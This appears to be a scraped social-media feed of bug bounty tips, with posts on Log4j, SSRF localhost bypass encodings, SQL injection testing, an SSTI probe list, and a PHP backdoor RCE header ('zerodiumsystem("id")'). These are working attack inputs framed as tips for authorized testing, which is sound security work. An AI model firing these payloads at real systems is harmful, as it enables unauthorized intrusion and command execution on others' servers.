Anton
6,086 posts
Anton
@therceman
Bug Bounty Tips | AI · LLM · Dev · Games @rcemandev
Bug Bounty Tip :: Log4j Vulnerability Cheatsheet 🔹 How It Works 🔹 Test Environments 🔹 Challenges & Labs (Rooms) 🔹 Where Payloads can be Injected 🔹 What Information can be Extracted 🔹 How To Identify (Services & Scanners)
- Bug Bounty Tip List of localhost addresses for SSRF bypass 🔹http://localhost 🔹http://127.1 🔹http://127.0.0.0 🔹http://127.0.0.1 🔹http://2130706433 🔹http://0177.1 🔹http://0x7f.1 🔹http://127.000.000.1 🔹http://localtest .me 🔹http://[::1] 🔹http://[::] Cheers!
- Bug Bounty Hint How to test for SQL injection 1) Select params for testing in: 🔹 URL query 🔹 POST body 🔹 Headers 🔹 Cookies It can be any parameter. Typically, I test integer parameters first. 🧵 1/8
- Bug Bounty Info GitHub Recon using GitHub Dorks 📖 Article shahjerry33.medium.com/github-recon-i… #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone
- Top 28 CyberSecurity Games Sharpen Your Bug Bounty Skills Credits to Morgan Hamlin
- Bug Bounty Tip SSTI (Server Side Template Injection) Payload List 🔹{7*7} 🔹*{7*7} 🔹{{7*7}} 🔹[[7*7]] 🔹${7*7} 🔹@(7*7) 🔹<?=7*7?> 🔹<%= 7*7 %> 🔹${= 7*7} 🔹{{= 7*7}} 🔹${{7*7}} 🔹#{7*7} 🔹[=7*7] If evaluated as 49 - the target is vulnerable Cheers!
- Bug Bounty Hint If you have found that server is running PHP - you can try to test it for RCE vulnerability. Append following header to request: User-Agentt: zerodiumsystem("id") If PHP version is vulnerable - you will execute system("id") command on a server.
- I believe the time has come to collect all my bug bounty tips and tricks into a PDF book.
- Bug Bounty Tip The best place to check for SQL injection is Order By clause in query / body params. Example: orderby=asc,(SQL PAYLOAD)
